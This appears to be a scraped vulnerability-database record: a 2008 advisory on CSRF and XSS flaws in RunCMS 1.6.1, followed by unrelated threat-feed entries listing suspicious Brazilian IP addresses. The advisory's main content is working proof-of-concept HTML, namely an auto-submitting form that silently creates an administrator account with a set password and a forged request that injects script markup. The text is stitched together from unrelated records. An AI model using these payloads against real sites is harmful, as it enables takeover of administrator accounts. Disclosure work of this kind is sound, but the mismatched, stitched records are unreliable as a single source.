{"id": "SECURITYVULNS:DOC:19182", "bulletinFamily": "software", "title": "RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties", "description": "###################################################################\r\nRunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN\r\n###################################################################\r\n\r\n[b]\r\n1) Create Webmaster (admin) XSRF Vulnerability[/b]\r\n<html><head></head><body onLoad="javascript:document.attack.submit()">\r\n<form action="http://localhost/xampp/runcms/modules/system/admin.php" \r\nmethod="post" enctype="multipart/form-data" name="r">\r\n<input type="hidden" name="uname" value="Attacker">\r\n<input type="hidden" name="name" value="Attacker">\r\n<input type="hidden" name="email" value="attack@attack.com">\r\n<input type="hidden" name="url" value="">\r\n<input type="hidden" name="user_avatar" value="blank.gif">\r\n<input type="hidden" name="theme" value="helloween">\r\n<input type="hidden" name="timezone_offset" value="0">\r\n<input type="hidden" name="language" value="deutsch">\r\n<input type="hidden" name="user_icq" value="">\r\n<input type="hidden" name="user_aim" value="">\r\n<input type="hidden" name="user_msnm" value="">\r\n<input type="hidden" name="user_from" value="">\r\n<input type="hidden" name="user_occ" value="">\r\n<input type="hidden" name="user_intrest" value="">\r\n<input type="hidden" name="user_birth%5b2%5D" value="">\r\n<input type="hidden" name="user_birth%5B1%5D" value="">\r\n<input type="hidden" name="user_birth%5BO%5D" value="">\r\n<input type="hidden" name="user_sig" value="">\r\n<input type="hidden" name="umode" value="flat">\r\n<input type="hidden" name="uorder" value="1">\r\n<input type="hidden" name="bio" value="">\r\n<input type="hidden" name="rank" value="7">\r\n<input type="hidden" name="pass" value="Password">\r\n<input type="hidden" name="pass2" value="Password">\r\n<input type="hidden" name="fct" value="users">\r\n<input type="hidden" name="op" value="addUser">\r\n<input type="hidden" name="submit" value="%DCbernehmen">\r\n\r\nAlso with XSRF an attacker can update the profile of all users. He can change \r\nthe password etc...\r\n\r\n[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]\r\n<html><head></head><body onLoad="javascript:document.r.submit()">\r\n<form action="http://localhost/xampp/runcms/modules/system/admin.php" \r\nmethod="post" enctype="multipart/form-data" name="r">\r\n<input type="text" class="text" name="rank_title" size="30" maxlength="50" \r\nvalue="<marquee>Cross-Site Scritping :-("/>\r\n<input type="hidden" name="fct" value="userrank">\r\n<input type="hidden" name="op" value="RankForumAdd">\r\n</form>\r\n</body>", "published": "2008-02-18T00:00:00", "modified": "2008-02-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19182", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 3, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2018-08-31T11:10:25", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB2874216", "KB3209587", "KB2788321", "KB981401", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34161", "1337DAY-ID-34158", "1337DAY-ID-34154", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:25", "rev": 2}, "vulnersScore": 2.5}, "affectedSoftware": []}

{"rst": [{"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **177[.]45.22.184** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **28**.\n First seen: 2020-12-18T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **generic**.\nASN 19182: (First IP 177.45.0.0, Last IP 177.45.191.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"So Paulo\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-18T00:00:00", "id": "RST:70EFB700-36D6-35EA-966C-01A9A2746DD5", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 177.45.22.184", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **177[.]45.64.97** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-01-11T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **shellprobe**.\nASN 19182: (First IP 177.45.0.0, Last IP 177.45.191.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"So Paulo\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-11T00:00:00", "id": "RST:D5AA34B9-8678-3EFD-AB9C-7507994EAC25", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 177.45.64.97", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **177[.]45.208.171** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **32**.\n First seen: 2020-12-27T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **generic**.\nASN 19182: (First IP 177.45.192.0, Last IP 177.45.255.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"So Paulo\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-27T00:00:00", "id": "RST:C397DF3D-51A5-344D-8A8F-0B992A57ECB4", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 177.45.208.171", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **177[.]45.199.16** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **16**.\n First seen: 2020-11-30T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **generic**.\nASN 19182: (First IP 177.45.192.0, Last IP 177.45.255.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"Mococa\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-30T00:00:00", "id": "RST:6F60F7D9-414D-3F8C-A1B9-4618E5FE3C0A", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 177.45.199.16", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **201[.]87.32.244** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **generic**.\nASN 19182: (First IP 201.87.0.0, Last IP 201.87.127.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"So Paulo\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:57E03181-BD8C-3ECE-BE31-4FA98C873811", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 201.87.32.244", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **201[.]87.105.69** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-01-16T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **generic**.\nASN 19182: (First IP 201.87.0.0, Last IP 201.87.127.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"So Jos dos Campos\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-16T00:00:00", "id": "RST:61A8BD0C-7B75-32A5-B321-D7F720ED7DAE", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 201.87.105.69", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **179[.]97.166.148** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **46**.\n First seen: 2021-01-14T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **shellprobe**.\nASN 19182: (First IP 179.97.128.0, Last IP 179.97.191.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"Franco da Rocha\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-14T00:00:00", "id": "RST:4C82685E-FCFF-3C21-AF9A-2BB18B667720", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 179.97.166.148", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **179[.]97.166.90** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **generic**.\nASN 19182: (First IP 179.97.128.0, Last IP 179.97.191.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"Franco da Rocha\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:0B2B446A-6E6F-354B-A612-10A97F117B9E", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 179.97.166.90", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]121.114.64** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **41**.\n First seen: 2021-01-07T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **tor_exit**.\nASN 19182: (First IP 187.121.0.0, Last IP 187.121.127.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"Santo Andr\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-07T00:00:00", "id": "RST:AE661B11-D3C5-3C95-8D8F-6003C2FB72AB", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 187.121.114.64", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-16T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **187[.]121.114.213** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **33**.\n First seen: 2020-12-13T03:00:00, Last seen: 2021-01-16T03:00:00.\n IOC tags: **tor_exit, generic**.\nASN 19182: (First IP 187.121.0.0, Last IP 187.121.127.255).\nASN Name \"TELEFNICA\" and Organisation \"BRASIL SA\".\nASN hosts 75 domains.\nGEO IP information: City \"Santo Andr\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-13T00:00:00", "id": "RST:CA44A4FE-43E2-3CF8-A40B-66D3C4F93932", "href": "", "published": "2021-01-17T00:00:00", "title": "RST Threat feed. IOC: 187.121.114.213", "type": "rst", "cvss": {}}]}